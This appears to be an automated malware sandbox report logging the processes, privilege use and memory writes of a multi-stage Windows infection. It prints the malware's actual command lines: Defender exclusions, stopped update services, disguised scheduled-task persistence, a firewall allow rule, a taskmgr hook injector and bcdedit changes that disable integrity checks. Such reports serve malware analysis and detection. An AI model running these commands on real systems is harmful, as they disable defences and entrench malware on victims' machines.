N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\FB7B.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 1208 wrote to memory of 2652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 2652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 2652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2652 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2652 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2652 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe

"C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe"

C:\Users\Admin\AppData\Local\Temp\8594.exe

C:\Users\Admin\AppData\Local\Temp\8594.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\8798.exe

C:\Users\Admin\AppData\Local\Temp\8798.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\88D1.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\8A39.exe

C:\Users\Admin\AppData\Local\Temp\8A39.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\8C8B.exe

C:\Users\Admin\AppData\Local\Temp\8C8B.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\934F.exe

C:\Users\Admin\AppData\Local\Temp\934F.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2152 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9968.exe

C:\Users\Admin\AppData\Local\Temp\9968.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 268

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\B5BF.exe

C:\Users\Admin\AppData\Local\Temp\B5BF.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2152 CREDAT:275461 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\C682.exe

C:\Users\Admin\AppData\Local\Temp\C682.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\DFED.exe

C:\Users\Admin\AppData\Local\Temp\DFED.exe

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 520

C:\Users\Admin\AppData\Local\Temp\F68A.exe

C:\Users\Admin\AppData\Local\Temp\F68A.exe

C:\Users\Admin\AppData\Local\Temp\FB7B.exe

C:\Users\Admin\AppData\Local\Temp\FB7B.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231031031256.log C:\Windows\Logs\CBS\CbsPersist_20231031031256.cab

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {B91DC3BB-9B04-418A-A2F9-8068AD5EF48F} S-1-5-21-1861898231-3446828954-4278112889-1000:PTZSFKIF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {085A3BA4-4FCB-4F92-80B0-39E70D6FAC80} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

